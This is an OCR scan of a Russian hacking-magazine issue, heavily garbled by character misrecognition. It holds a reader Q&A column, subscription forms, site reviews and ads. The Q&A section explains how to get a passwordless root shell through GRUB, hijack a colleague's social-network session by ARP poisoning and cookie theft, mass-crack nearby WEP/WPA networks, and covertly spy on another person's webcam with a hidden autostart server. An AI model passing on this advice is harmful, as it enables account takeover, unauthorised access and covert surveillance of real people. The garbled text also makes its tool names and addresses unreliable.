— это загрузчик. Именно ОРІІВ и поможет 
нам получить шелл на этой машине. Алго- 
ритм действий в такой ситуации может быть 
следующим: 

• загружаемся до списка вариантов загрузки; 

• выбираем Біпих; 

•заходим в режим редактирования. В зави- 
симости от версии загрузчика это делается 
следующим образом: в ОРБІВ2 достаточно 
нажать клавишу «е», а в ОРІІВ Бедасу нужно 
нажать «е», выбрать строку для редактирова- 
ния и затем снова нажать «е»; 

• ищем строку, начинающуюся с «Ііпих» или 
«кегпеі», и удаляем из нее слова «цше!» и 
«зрІазЬ» (если таковые имеются), а в конце 
дописываем «зіпдіе іпі1:=/Ьіп/Ьа5Ь»; 

• загружаемся (если установлен ОРІІВ2, 
жмем Сігі+Х, если ОРІІВ Бедасу — Езс, а 
потом Ь). 

В результате данных манипуляций получаем 
рутовую консоль без всяких паролей и ненуж- 
ных вопросов. 

О: Исследую программу в дебаггере. 
Подскажи, как можно отловить все об- 
ращения к определенной переменной. 

А: В данном случае нужно поставить брейкпо- 
инты на доступ (чтение или запись) вучасток 
памяти, где хранится значение переменной. 

В ОНуОбд это делается просто: выделяем 
участок памяти, в которому нас хранится пе- 



ЬодИесЬ ТоисГі Моизе — управление 
мышкой и клавиатурой с іРЬопе/ 
іРасІ 




ременная, кликаем правой кнопкой мыши и 
выбираем «Вгеакроіпі Метогу, оп ассезз». 
Если же ты используешь ѴѴіпбЬд, то нужно 
воспользоваться командой Ьа. Она имеет 
следующий формат: [Ьа г/ѵѵ/е зіге абг], где 
г/ѵѵ/е определяеттип брейкпоинта (на чтение, 
запись или выполнение), зіге — размер об- 
ласти памяти, а абг — адрес области памяти. 

О: Есть ли возможность запустить про- 
извольный бинарник под отладчиком в 
ѴізиаІ Бйісііо? 

А: Да, можно. Есть несколько вариантов: 

1. Через меню «Бііе Ореп-> Рго)ес1;/ 
Зоіиііоп» выбрать произвольный бинарник 
(скажем, с:\ѴѴіпбоѵѵ5\5у5Іет32\саІс.ехе); 

2. Или же в произвольном проекте указать 
произвольный бинарник в качестве «ОеЬид 
соттапсі И пе». 

О: Есть задача — максимально прос- 
то заголиниться под учеткой другого 
человека в социальной сети. Упрощает 
задание то, что мы работаем в одной 
локалке. 

А: В общем-то, подход в данной ситуации 
очевиден — склонировать НТТР-сессию, 
подрезав у клиента кукисы. Но если ищешь 
самый простой и удобный способ, есть резон 
за юзать утилиту ЗеззіопіЫе^ [ зспр^ипкіеі . 
ѵѵогбрге55.сот/201 0/07/1 7/5е55Іоп1:ЫеЯ . 
Прога сама смотрит, какие клиенты есть 
в сети, выполняет АРР роізоп для реали- 
зации снифинга и перехватывает пакеты, 
извлекая из них НТТР-данные. Мало этого, 
после извлечения из трафика данных сессий 
Зеззіоп^Ыеб создает для каждой из них 
временный профайл в БігеБэх’е для более 
удобного переключения. 
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Прога для сброса САА05 из винды 

О: Подскажи самый простой инстру- 
мент для того, чтобы записать и далее 
воспроизвести действия пользователя 
в системе. Необходимо эмулировать 
активность юзера. 

А: Существует довольно много библиотек и 
приложений для автоматизации, о которых 
мы не раз писали (ОоІІ, АиІоІТ и т.д.). Если 
говорить о наиболее простом и понятном 
варианте, то рекомендую попробовать Мітег. 
С ее помощьюты можешь просто «записать» 
движения мыши, нажатия на клавиши клави- 
атуры, и воспроизвести записанный макрос в 
любой момент, втом числе и по расписанию. 

О: Спасибо вам за материалы по 
пентесту беспроводных сетей. На деле 
все действительно оказалось совсем 
несложно. Хочу написать приложение, 
которое будет массово подбирать 
ѴУ/ЕР-ключ для всех 55Ю, которые есть 
поблизости. Ничего похожего я не на- 
шел, но, может быть, ребята из журнала 
подскажут? 

А: Написать свою собствен нуютулзу всегда 
полезнее, чем использовать что-то уже 
готовое. Хотя и дольше. :) В недавнем релизе 
Васк1хаск4 Р1 появиласьутилита ѴѴібІе, 
которая как раз и задумывалась для одно- 
временной атаки на несколько защищенных 
с помощью ѴѴЕР и ѴѴРА беспроводных сетей. 
Параметры для взлома (минимальный сигнал 
точки доступа, тип атаки на ѴѴЕР, словарь для 
перебора ит.д.) можно задать через 6111-ин- 
терфейс или же через консоль. Мне особенно 
приглянулосьто, что ѴѴібІе делает бака п всех 
перехваченныхѴѴРАЬапсІзЬаке'ов. 

О: Как можно незаметно подсмотреть 
изображение веб-камеры с чужого 
компьютера? 

А: Та к ил и иначе, на удаленном компьютере 
все равно придется установить какую-то 
серверную часть. Как вариант — можно 
воспользоваться программой РетСат2 
( гебзЬ.ги ). предназначенной для соединения 
с удаленными аудио/видеоустройствами. 

Для установки в систему (в том числе для 
настройки автозагрузки) используется скрипт 
іпзіаіі.стсі, в котором необходимо указать 
путь для установки, название процесса (би - 
нарник можно обозвать какугодно), пароль 




для доступа к серверу, порт, на котором он 
будет принимать подключения, а также ветку 
реестра, где необходимо прописать автоза- 
пуск. Если удалось выполнить установку, то ты 
без труда сможешь подключиться к серверу 
с помощью клиентской части и принимать 
в реальном времени аудио и видео потоки с 
удаленного компьютера. 

О: Пишу небольшую х-тулзу, которой 
необходимо отлавливать (а в идеале — 
иметь возможность модифицировать) 
НТТР-трафик локального компьютера. 
Как это лучше всего реализовать? 

А: Тебе наверняка знакома программа 
ЕібсИег. Это специальная прокси, кото- 
рая перехватывает весь НТТР(8]-трафик 
и предоставляет удобные средства для 
манипулирования с ним. Например, можно 
становить своего рода брейкпоинты или опи- 
сать триггеры с помощью системы событий 
и скриптовой подсистемы. Так вот, авторы 
оформили весь функционал своей программы 
в виде библиотеки РісісіІегСоге ( ЛсІсІІег.ѵѵікісІоТ 
сот/бсісііегсоге ). которая легко подключается 
клюбым .ЫЕТ-проектам. В результате весь 
функционал по перехвату и модификации 
трафика можно интегрировать в любое при- 
ложение через понятный АРІ. 

О: Есть ли способ сбросить пароль БИОС 
прямо из \А/іпсІоѵѵ$, не прибегая к аппа- 
ратному методу (с помощью перемычки 
на материнской плате или вытаскива- 
ния батарейки)? 

А: Для многих материнских плат может по- 
мочь сервисная утилита СМ05 □е-АпітаІог 
( ѵѵѵѵѵѵ.зі-ѵѵаге.сопп ). которая позволяет бэка- 
пить СМ05, восстанавливать дамп, а также 
сбрасывать все его настройки, втом числе 
пароль. Собственно, опция «СІеагСМОЗ» — 
именното, что тебе нужно. 

О: Какому инструменту можно доверить 
полное удаление файлов с жестких дис- 
ков без возможности восстановления? 

А: Понятно, что без загрузочного инстру- 
мента здесь не обойтись. Советую обратить 
внимание на Оагік'з Вооіапсі Мике ( ѵѵѵѵѵѵ. 
сІЬап.огс ). Это ЫѵеСО, специально созданный 
для безопасного удаления данных сжестких 
дисков. Будь осторожен — ОВАЫ автомати- 
чески и полностью удалит все содержимое 
хардов, которое сможет обнаружить. По этой 
причине его можнотакже использовать, как 
инструмент для экстренной очистки жестких 
дисков, не требующий твоего вмешательства: 
«вставил в привод, ребутнулся — все файлы 
потерлись». 

О: Купил себе іРосІ и понял — более тор- 
мознутой программы, чем іТипез, я не 
видел давно. Какие есть альтернативы, 
которые будут работать как надо? 

А: Да, іТипез многие недолюбливают, и это 
определенно одно из направлений, в котором 



Арріе стоит меняться к лучшему. Что касается 
альтернатив, то из бесплатных можно поп- 
робовать следующие программы: СоруТгапз 
МападеН ѵѵѵѵѵѵ.соруІхапз.пеІ:). ЕооЬаг2000 
( \ллл/\л/ТооЬаг2000.огд ). МебіаМопкеу ( ѵѵѵѵѵѵ. 
тесііатопкеѵ.сот ). БопдЬігсІ ( деізопдбігсі.сопп ). 

О: Как сгенерировать надежный пароль, 
используя лишь командную строку? 

А: Я всегда это делаю простой комбинацией 
сіаСе I тсібзит. Ноучти, баіе и тсібзит — 
это никсовые команды. Если хочешь исполь- 
зовать их под виндой, придется установить 

Судѵѵіп ( ѵѵѵѵѵѵ. сѵдѵѵіп. сот ]. 

О: Хочу использовать тач-скрин телефо- 
на в качестве тачпада для компьютера 
и ноутбука. То есть сидеть на диване и 
через ѴУ/і-Рі на расстоянии управлять кур- 
сором мыши на компьютере с помощью 
сенсорного экрана смартфона. 

А: 0 такой возможности задумалась и 
небезызвестная компания Еодііесб, которая 
недавно выпустила любопытное приложение 
І_оді*есН ТоисН Моизе ( ѵѵѵѵѵѵ.ІодіІесЬ.сот ). 
Схема работы выстроена по стандартной схе- 
ме «клиент-сервер». На компьютереустанав- 
ливается серверная частьТоисб Моизе Бегѵег 
(на текущий момент доступны версии для 
винды и Мае 05 X), а на іРЬопе или іРоб ТоисЬ 
— клиентское приложение ТоисЬ Моизе. 
Собственно, для подключения нужно лишь 
знать ІР’шниксервера, после чего можно 
использовать телефон каксенсорную панель 
для управления курсором мыши компьютера. 
Мало этого, если переключиться в режим кла- 
виатуры, то прямо с экрана телефона можно 
вполнеуспешно набирать тексты. Интересно, 
какскоро появится версия ТоисЬ Моизе для 
других мобильных платформ, и, прежде всего, 
АпбгоісІ? 

О: Наткнулся на объявлении о заработке 
с помощью партнерок файлобменных 
сервисов. Это не развод? Есть ли реаль- 
ная возможность заработать? 

А: При правильном подходе и реально рабо- 
тающей партнерке, которая исправно выпла- 
чиваетпо реферальной программе деньги, 
заработать, конечно, можно. Нотутважно, 
конечно, выбрать правильную партнерку — 
рекомендую выбирать та кие сервисы, которые 
работаютс иностранным пользователями. 
Ребята из США и Европы готовы платить, не 
скупятся и не ищут, где файл можно скачать 
бесплатно. А если они платят — получаешь 
деньги и ты. 

Ктомуже еобходимо выбрать такой сервис, 
который принимает платежи с помощью кре- 
дитных карт или РауРаІ. В противном случае 
дажелояльный иностранный пользователь 
сразу сольется. В-третьих, важно генериро- 
вать та кие файлы для скачивания, которые 
могутзаинтересоватьлюдей. Подумай, что 
тебе самому интересно, — и все сразу станет 
понятно. Ш-И 
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ИССЛЕДУЕМ ОШИБКИ В БАНКОВСКОМ СОФТЕ 






I 








БУДЬ ХИТРЫМ! 

ХВАТИТ ПЕРЕПЛАЧИВАТЬ В КИОСКАХ! 

СЭКОНОМЬ 800 РУБЛЕЙ НА ГОДОВОЙ ПОДПИСКЕ! 



+ 



ВСЕГО 191 РУБЛЕЙ ЗА НОМЕР 




ГодоваялодпиСка по иене 2200 руб. 
(в^ьигнбстАвку) что на 23% дешевле 

ЧЕМ РЕКОМЕНДУЕМАЯ РОЗНИЧНАЯ ЦЕНА (250 РУБЛЕЙ ЗА НОМЕР) 



ЩЕ НЕ ВСЕ! 



ПОЛУЧИ В ПОДДРвК ОДИН ЖУРНАЛ ДРУГОЙ ТЕМАТИКИ! 



8.5 Гб 

т 



Оформив годовую подписку в редакции, 

ты сможешь бесплатно получить один свежий 

номер любого журнала, издаваемого компанией «Гейм Лэнд»: 

ЯНВАРСКИЙ НОМЕР - ПОДПИСАВШИСЬ ДО 30 НОЯБРЯ, 
ФЕВРАЛЬСКИЙ НОМЕР - ПОДПИСАВШИСЬ ДО 31 ДЕКАБРЯ, 
МАРТОВСКИЙ НОМЕР - ПОДПИСАВШИСЬ ДО 31 ЯНВАРЯ. 






Страна Игр 


Тюнинг 


Форсаж 


Тоіаі РооіЬаІІ 


Тотал ОѴО 


Свой бизнес 


ОѴОХрегі 


Железо 


Бгтпоке 


+ ОѴО 


Автомобилей 




+ ОѴО 


+ ОѴО 






+ ОѴО 





ШІ В 



ЖЕЛЕЗО 

к-долч лши 



ХУ/ІИ гл и 



і і/і!"Івтл 




Хулиган РС Игры Моипіаіп Віке Оідііаі РГюІо Фотомастерская ТЗ Вышиваю ОпЬоагсІ Бкі Равз 

+ ОѴО + 2 ОѴО + ОѴО + ОѴО крестиком 



ВНИМАНИЕ! ВТОРОЕ СПЕЦПРЕДЛОЖЕНИЕ! 




ПРИ ПОДПИСКЕ НА КОМПЛЕКТ ЖУРНАЛОВ 
Е ЖЕЛЕЗО + ХАКЕР + 2 0Ѵ0: - ОДИН НОМЕР ВСЕГО ЗА 162 РУБЛЯ 
^ (НА 35% ДЕШЕВЛЕ, ЧЕМ В РОЗНИЦУ) 

^БЕСПЛАТНАЯ ПОДПИСКА НА ЛЮБОЙ ЖУРНАЛ НА ОДИН МЕСЯЦ 



ЗА 12 МЕСЯЦЕВ 3890 РУБЛЕЙ (24 НОМЕРА) 
ЗА 6 МЕСЯЦЕВ 2205 РУБЛЕЙ (12 НОМЕРОВ) 



ВПИШИ В КУПОН НАЗВАНИЕ ВЫБРАННОГО ЖУРНАЛА, 
ЧТОБЫ ЗАКАЗАТЬ ПОДАРОЧНЫЙ НОМЕР. 




ПОДПИСКА — ЭТО ЛЕГКО! 

1. Разборчиво заполни подписной купон и квитанцию, 

вырезав их из журнала, сделав ксерокопию 
или распечатав с сайта Ьйр://5Ііор.аІс.ги . 

2 . Оплати подписку через любой банк. 

3. Вышли в редакцию копию подписных документов - 
купона и квитанции - любым из этих способов: 

- по электронной почте зиЬзсгіЬейдІс.ги ; 

-по факсу (495) 780-88-24; 

- по адресу 1 19021 , Москва, ул. Тимура Фрунзе, 

д. 1 1 , стр. 44, ООО «Гейм Лэнд», отдел подписки. 



Еще один удобный способ оплаты подписки на любимое 
издание - в любом из 72 000 платежных терминалах ОІѴѴІ 
(КИВИ) по всей России. 




ВНИМАНИЕ! 

Подписка оформляется в день обработки купона и квитан- 
ции в редакции. 

Подписка оформляется с номера, выходящего через один 
календарный месяц после оплаты. Например, если вы про- 
изводите оплату в ноябре, то журнал будете получать с 
январского номера. 

Единая цена по всей России, доставка за счет издателя. 

Для жителей Москвы (в пределах МКАД) доставка может 
осуществляться курьером "из рук в руки" в течение трех 
рабочих дней с момента выхода номера на адрес офиса 
или на домашний адрес. Этот способ доставки также бес- 
платен для подписчиков. 



Подписка на 6 месяцев с доставкой стоит 1260 рублей (без подарочного журнала). 

Подписка на 6 месяцев без доставки с получением журнала самостоятельно в Москве в точке 
продаж К-кіозк рядом с метро Белорусская, ул. Грузинский вал, д.27-31 — всего 648 рублей. 

Получить журнал можно будет у продавца с предъявлением паспорта на имя оформившего подписку в течение недели, 
начиная со следующего дня после дня выхода журнала. 



О С П I— I М I П0 БЕСПЛАТНЫМ ТЕЛЕФОНАМ (495)780-88-29 (ДЛЯ МОСКВИЧЕЙ) И 8-800-200-3-999 (ДЛЯ ЖИТЕЛЕЙ ДРУГИХ РЕГИОНОВ РОССИИ, 
опипѵі ! АБОНЕНТОВ СЕТЕЙ МТС, БИЛАЙН И МЕГАФОН). ВАШИ ВОПРОСЫ, ЗАМЕЧАНИЯ И/ИЛИ ПРЕДЛОЖЕНИЯ ПО ПОДПИСКЕ НА ЖУРНАЛ 
ПРОСИМ ПРИСЫЛАТЬ НА АДРЕС ІМР0Й6ЕС.РЦ ИЛИ ПРОЯСНЯТЬ НА САЙТЕ УУУУУУ.ОЮ.ВЦ В РАЗДЕЛЕ «ПОДПИСКА». 



ПОДПИСНОЙ КУПОН 



ПРОШУ ОФОРМИТЬ ПОДПИСКУ 
НА ЖУРНАЛ « 


» 


□ на 6 месяцев 
Л на 12 месяцев 
начиная с 


20 г. 


| — | прошу выслать бесплатный 
номер журнала 



I — I Доставлять журнал по почте 
1 — 1 на домашний адрес 

Доставлять журнал курьером : 

Г~1 на адрес офиса* 

Г~1 на домашний адрес** 

(отметь квадрат выбранного варианта подписки) 

Ф.И.О. 



АДРЕС ДОСТАВКИ: 

индекс 

область/край 

город 

улица 

дом корпус 

квартира/офис 

телефон ( ) 

код 

е-таіі 

сумма оплаты 

*в свободном поле укажи название фирмы 
и другую необходимую информацию 
**в свободном поле укажи другую необходимую информацию 
и альтернативный вариант доставки в случае отсутствия дома 

свободное поле 



Извещение 



ИНН 7729410015 ООО «Гейм Лэнд» 

ОАО «Нордеа Банк», г. Москва 

р/с № 40702810509000132297 



к/с № 30101810900000000990 



БИК 044583990 




КПП 770401001 


Плательщик 


Адрес (с индексом) 


Назначение платежа 
Оплата журнала « 


» 


Сумма 


с 


20 г. 





Кассир 



Ф.И.О. 

Подпись плательщика 



Квитанция 



ИНН 7729410015 



ООО «Гейм Лэнд» 



ОАО «Нордеа Банк», г. Москва 
р/с № 40702810509000132297 



к/с № 30101810900000000990 



БИК 044583990 




КПП 770401001 


Плательщик 


Адрес (с индексом) 


Назначение платежа 
Оплата журнала « 


» 


Сумма 


с 


20 г. 





Ф.И.О. 



Кассир 



Подпись плательщика 






«5 

ТТР://\Л/\А/ѴѴ2 




ТЬо Торс**- СвтппипЫу * 264.02? 4(гепд 




ДЛЯ ТРЕКИНГА 
РАБОЧЕГО ВРЕМЕНИ 



ічни щн^м АПЛ 



ивднмк 




ДЛЯ СОРЕВНОВАНИЯ 
В ПРОГРАММИРОВАНИИ 



ТОРССЮЕВ 

ѵѵмѵѵ.іорсосіег.сот 

Ѳ Чувствуешь свои силы в программировании? Хочешь показать себя 
и проверить, на что ты способен? Естьжелание повысить свои навыки? 
Хороший способ — участие в онлайн-соревнованиях по программиро- 
ванию. Одной из наиболее авторитетных площадокдля битвы мозгов 
является ресурс ТорСобег. Здесьдважды в неделю проводятся соревно- 
вания по программированию на баѵа, С++ и С#, причем участники могут 
выиграть от$25 до $300. Крометого, ресурс проводит неофициальный 
чемпионат мира по программированию среди профессионалов — 
ТорСобегОреп. На заметку еще один серьезныйтурнир, гдеты можешь 
поучаствовать — боодіе Собе бэт. 




ОИЗ-СЕРВИС 
С МОМЕНТАЛЬНЫМ 
ОБНОВЛЕНИЕМ БАЗЫ 




ТАНОМЕТЕВ 

ѵѵѵѵѵѵ.ГаІіотеГег.сот 

О Большая проблема любого задания — сложность в измерении 
времени, которое потребуется на его решение. Отсюда и сложности с 
ответом на вопрос: «За сколько денегты сделаешь эту работу?». Один 
из правильных подходов подсчитать стоимость услуги — отследить 
затраченное на работу время и умножить его на фиксированную ставку 
в час. Мониторить рабочую активность пользователя позволяет сервис 
ІаЬотеІег, который работает в связке со специальным клиентом, уста- 
навливаемым в систему. Решение можно использовать какдля себя, так и 
для контроля эффективности сотрудников. ІаЬотеІег — оченьтехноло- 
гичный сервис, его клиентские части есть для разных ОС. 




ірасо 

ѵѵѵѵѵѵ.ірд.со 

О Каждый знает о существовании сервисов вроде Ьіі.Іу или Ііпу.сс, 
которые превращают длинный ІІГСІ.-адрес в короткий линк (например, 
ЬПр://Ь№.Іу/9<ЖІ7Ь). Так вот, ірц.со предлагает похожий сервис, но не для 
ссылок, а для ІР-адресов. По сути, это БЫЗ-сервер, который моментально 
обновляетсвои базы и нетребует регистрации. Можноуказать нужный 
ІР’шник, один раз кликнуть и через секунду получить Ьозіпате вроде 
п4с1 ОЬ.ірц.со, который сразу будет делегироваться. Если есть необходи- 
мость, первую частьдоменного имени можно указать самому. Наделе ірц. 
со — это самый быстрый способ получить рабочий домен, благо, сервис не 
требует какой-либо регистрации вообще. 



5РОТТНЕѴІЛМ 

ѵѵѵѵѵѵ.зроДГіеѵиІп.сот 

Ѳ В одном из номеров мы рассказывали о специальных площадках 
для хакера, позволяющих оттачивать свои навыки взлома и тестов на 
проникновения, не нарушая закон. Ресурс ЗроГГНеѴиІп также пресле- 
дует образовательные цели в области информационной безопасности 
и является своеобразной энциклопедией распространенных ошибок. 
Что это значит? Откроем, скажем, раздел «ЗОИ Іщесбопз» — здесь мы 
подробно можем прочитать об этом типе уязвимостей. Но самое главное 
— на примерах реальных скриптов (например, ѴѴогсІРгезз] в ЗроіТЬеѴиІп 
продемонстрированы и объяснены все типы ошибок, которые приводят 
к критическим уязвимостям. Хорошее подспорье какдля программис- 
тов, так и для начинающих специалистов в области ИБ. 
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БЫСТРЫЙ ВЗЛОМ ГОЛОДА! 




50% сотріеіесі 




Загружено: 100 % вкуса, 100 % пользы 



Открытъ еще один глазированный сырок "Зебра" 
после завершения загрузки 




Я сьгг :) 



у ери :) 



Взломай голод, пока он не взломал тебя! 

Ты ещё думаешь, как? 

Просто - с помощью глазированного сырка «Зебра»! 



Ищи на прилавках города! 





Ѵі$иаІ Біисііо 



МісгозоП 



/*КОД ПОВСЮДУ*/ 






_сю 




ТВ 

-«1- 



•Оо 





оо 



Код. Он есть во всем, что нас окружает. Он всюду, куда бы ты 
ни посмотрел. Он таит в себе неограниченные возможности. 
Используя их, ѴізиаІ БШсІіо 2010 поможет реализовать любые 
идеи с помощью новых инструментов, которые перевернут 
твое представление об эффективной работе, начиная 
с дизайна и разработки и заканчивая запуском проекта. 

МИР КОДА В ТВОИХ РУКАХ. 

А НА ЧТО СПОСОБЕН ТЫ С ѴІ51ІАІ. 5ТІГОІО 2010? 



Узнай больше на ѵ$2010.ги 



!тИ И 




_ , , ~ Ц Сфотографируй этот знак и получи последние новости о ѴізиаІ 51:іісііо. 

Ф Р Ф РУ В Загрузи бесплатное приложение для своего мобильного на ННрУ/деНад.тоЫ. 

О 2010 МісгозоН Согрогайоп. Все права защищены. Владельцем товарных знаков МісгозоН, ѴізиаІ Бѣисііо 2010, зарегистрированных на территории США и/или других стран, и владельцем 
авторских прав на их дизайн является корпорация МісгозоП. Другие названия компаний и продуктов, упомянутых в тексте, могут являться зарегистрированными товарными знаками 
соответствующих владельцев. 

Реклама. 






